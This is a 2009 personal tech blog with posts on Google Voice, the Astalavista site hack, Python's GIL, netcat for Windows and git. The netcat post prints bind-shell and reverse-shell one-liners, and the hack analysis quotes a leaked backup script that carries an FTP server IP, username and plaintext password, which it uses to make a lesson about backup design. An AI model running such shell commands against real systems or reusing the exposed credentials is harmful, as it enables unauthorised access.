Jon's Blog

Google Voice Provides a Lot for Free

Sat, 01 Aug 2009 07:38:56 -0600

I've been using Google Voice for about a month now, and I have been impressed in some ways, but let down in others. If you aren't familiar with it, Google Voice provides you with a phone number that you can configure in a number of ways. For example, the number could be configured to ring your cell phone during the day, and your home phone in the evenings.

Google Voice can perform call screening and provides a lot of features that prevent a phone from constantly interrupting your work flow. When you choose not to answer a call to your Google Voice number, or if you aren't available, the call goes to voice mail. These messages are automatically emailed to you as short audio clip along with Google's best attempt at converting the audio to text. So, your voice mail messages are actually searchable by keyword. This post is in no way going to cover all of the products features. For that, you'll want to look at its home page.

Unlimited Cell Calling

Google Voice provides a free long distance service. In order to use it, you either need to initiate the call from the web interface, or call your own Google Voice number and then dial the number you wish to be connected to. This alone is pretty great feature, because it eliminates the need for long distance service on land line phones, but it gets even more interesting with cell phones.

If you have a plan with unlimited calling to specific numbers (like Verizon's friend and family numbers), you can simply add you Google Voice number to this list and get unlimited calling to everywhere all the time regardless of how many plan minutes you actually have. It turns out that I am not a lawyer, so I'm not going to promise that doing this doesn't break the terms of service along the way, but it is interesting either way.

Free Dial-up from anywhere in the US

In case you don't remember, dial-up gives you the ability to connect to the internet through a standard phone line. That seems archaic and wrong, but it could still have some small use today.

Let's say that for some reason, your primary internet connection goes out. Perhaps a gopher chewed threw you cable, lightning struck your DSL line, or you get hit with a chrono-EMP that disable all electronic devices created in the last 10 years. Well, with Google Voice and free dial-up provider, you can still check you email.

There are quite a few services that provide free dial-up access. A quick Bing search pointed me toward fastfreedialup.com, dialinfree.net, and freedialup.org.

You might be wondering what I need Google Voice for if these services are already free. Well, the services themselves are free, but most of them don't provide many local access numbers, meaning the entire call will cost you a long distance fee if you don't have unlimited long distance. However, if you place the call through your Google Voice number, you don't have to worry about long distance charges.

This was a little tricky to get working, so if you are planning to try it, make sure you tell your modem to add spaces at the appropriate time to give it time to connect you to each piece of the chain. This is usually done by sending a comma (,) to the modem. For example, this worked well for me:

(My GV Number),*,(PIN),2,(Number to dial)#,,,,

Your mileage may vary, but that worked for me in the one quick test that I did. Dial-up is pretty awful, but it can be useful in a pinch.

SMS Blocking

A lot can be said about the price of text messages. They are one of the areas that provide carries with a huge amount of income for almost no cost. Most entry level cell phone plans charge between $.10 and $.20 for each text message. This can be a pretty hefty cost if you start getting a lot of incoming text messages from people that don't realize that you are getting charged for each one.

Google Voice can be pretty helpful here. If you aren't giving out your cell phone number, and instead just give out your Google Voice number, text messages won't come directly to your phone. Google Voice allows you to choose what to do with text messages. They can be forwarded on to you mobile device, or they can simply be sent to your email. I haven't actually tried it, but I think that the forwarding rules for SMS are tied in with those for normal voice calls, so you could even choose which numbers allow texts to be forwarded to your phone.

Conclusion

Google Voice can provide a lot of added value for a free service. It is understandable that Apple has decided not to allow Google Voice on the iPhone. It changes a lot by providing unlimited long distance and removing a lot of the hassles of changing providers. You keep your Google Voice number even when you get a new cell plan or move to a new area code, so there isn't as much reason to stick with the same carrier forever.

If you'd like to try Google Voice but haven't received an invite yet, I have a few to give away. Shoot me an email, and I'll happily forward one on to you.

Analyzing the Astalavista Hack

Mon, 08 Jun 2009 15:22:12 -0600

Several days ago, astalavista.com was torn down by an anti-security group. If you are not familiar with it, astalavista is a "security" community that discusses and hosts vulnerability information and exploits. The site appears to have been completely destroyed by attackers.

The attackers posted a text document detailing what they did on the site after they took it down. There is a copy of it hosted here. I went ahead and mirrored it here in case the other goes offline for whatever reason.

The details of the exploit itself are rather lacking. It appears to be some type of buffer overflow which created a shell through apache on port 80. From there they did some poking around and eventually executed a second exploit which escalated their privs from the apache user up to root.

This is already a huge problem, because the box is completely owned. The MySQL database passwords were available in plain text in various php files, so it was quick work to dump these. Root access meant that all the files on the server could be deleted at will. This is a bad situation to get your server into, and the only real way to avoid it is to keep all your services up to date and hope not to get hit by a zero day exploit.

The main thing that can be learned from this is the part of the attack that is truly the worst in my mind. The site had offsite backups, but they were unfortunately not being performed in the best way:

sh-3.2# cat /home/com/backup_system/backup.sh
#!/bin/sh
#####################################################################
#                                                                   #
#   incremental backup for astalavista.com                          #
#                                                                   #
#   author:    Paulo M. Santos <paulo.santos@astalavista.com>       #
#                                                                   #
#####################################################################
[snip]
PROG_DIR="/home/com/backup_system";
BACKUP_DIR="/home/com/backups";
DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
# ftp for synology backup server
FTP_HOST="212.254.194.163";
FTP_PORT="21";
FTP_USER="astalavista.com";
FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
FTP_DIR="/astalavista.com";

That's bad. They have the ftp host and password in plain text for their offsite backup. This allowed the attacker to log in to the backup server and delete all of the offsite backups as well. The key takeaway here is that if you are doing offsite backups, you should make sure that the two servers are separated in a way that doesn't allow a user who roots one to also destroy the other.

Python Global Interpreter Lock

Mon, 27 Apr 2009 14:00:00 -0600

Some friends and I have been playing around trying to write a game engine in Python. In an effort to avoid premature optimization, the whole thing has been single threaded up until this point. We're all still learning Python and hadn't used it for multithreading anything, but we figured that because it was Python, multithreading would be a simple task. We were right, to an extent.

Threading in Python really is a breeze. You simply import threading, create some threads, and start them up. Unfortunately, I coded that up and the game ran slower, even on multicore machines. After looking around the Python docs, I discovered that Python uses a global interpreter lock. This means that each Python interpreter can only execute one thread at a time. Threading is basically implemented via time sharing and not real threads. This means that threading doesn't actually give you any concurrency which makes programming much simpler, but it kills performance on multicore machines.

The truly unfortunate problem with the GIL is that you can't turn it off. There is no way to tell Python that I really do want it to run multiple interpreter threads and that I am willing to accept the overhead of performing locking on objects. The best workaround for this is to spawn multiple interpreter processes and communicate between them, but this incurs significantly more overhead than threading, and it is more difficult to implement.

After posting about this on a tech news site that I use, I learned about unladen-swallow which is a project that plans to greatly improve the performance of the Python interpreter. Among other things, the unladen-swallow team would like to "remove the GIL and fix the state of multithreading in Python". I hope that this projects goes somewhere and eventually becomes a part of Python. Until then, I'm going back to C++.

Netcat for Windows

Fri, 10 Apr 2009 19:52:48 -0600

Netcat is a simple networking utility which reads and writes data across network connections using the TCP/IP protocol. It's a wonderful tool for debugging all kinds of network problems. It allows you to read and write data over a network socket just as simply as you can read data from stdin or write to stdout. I have put together a few examples of what this can be used to accomplish.

Establishing a connection and getting some data over HTTP:

# nc example.com 80
GET / HTTP/1.0


<HTML>
<!-- site's code here -->
</HTML>

Creating a shell:

Remote machine: nc -l 1234 -e /bin/bash
Local machine: nc remote_machine 1234

Creating a reverse shell:

Local machine: nc -l 1234
Remote machine: nc -e /bin/bash local_machine 1234

That's all great, but there's really no point of writing another tutorial about netcat. There are several good ones already floating around. This post is actually a story about how this site became what seems to be the most popular source for the windows version of netcat.

For a long time now, I've had a flash drive that I carry around with me that has all sorts of useful utilities on it. Among these is the windows version of netcat. Unfortunately, several years ago, antivirus vendors decided it would be cool to start flagging netcat as a hack tool and automatically delete it from my flash drive upon insertion. This is easy enough to fix on my own computer by white listing netcat, but anytime I would work on another person's computer, the file would still be deleted.

This got to be somewhat annoying, especially as the windows version of netcat became more and more difficult to find. The most recent deletion took several minutes of digging through Google results and broken links in blogs before eventually finding a link that worked. I decided that I didn't want to go through that again, so I threw the file up in my document root and let the blogger whose link actually worked know that I had created a mirror of the file.

A few weeks later, I was digging through my Apache logs and noticed that I had an unusually large amount of traffic (I'm sure you are shocked to learn that the traffic from this blog isn't maxing my bandwidth). As I began to look at things more closely, I discovered that I was getting hundreds of hits per day to netcat. The referrer pointed me back to the netcat page on wikipedia. At some point, some wikipedian linked back to the file on my server, and it has been happily serving it ever since. It's a good thing netcat is nice and small.

Download Netcat for Windows

EDIT: Rodney Beede has compile a version without the -e option enabled. This should remove most of the antivirus blocking issues if you don't need that feature. More information, including a download, can be found here.

Learning Git

Thu, 05 Mar 2009 22:34:35 -0600

I've been planning on getting more familiar with git for several months. Yesterday, I watched the Google talk in which Linus Torvalds covered many of the advantages of the tool.

I use git for most of my personal stuff because distributed version control is certainly the simplest to use when there is only one person working on the project. It's extremely simple to create a repository. All you need to do is have git installed, and run a few commands.

That's about the extent of what I knew how to do with git. I could check things out, commit things back, and do a little reverting if I needed to. That's all simple, and it's often all that I need. However, git really starts to become useful when you get a better understanding of how branching and merging works.

I find centralized revision control to be a more intuitive model, but that is probably just because it is what I am familiar with. Distributed systems have no central repository. Each individual who pulls from a repository makes a copy of it on their local machine. Any changes they make can be committed to their local repository. After they finish what they are working on, their repository must be pushed or pulled into another repository. Essentially, everyone gets their own repository, which must eventually be merged back.

I was considering explaining the basics of git here, but the community book does a fantastic job of that. This page does a pretty good job of explain how git actually works under the hood.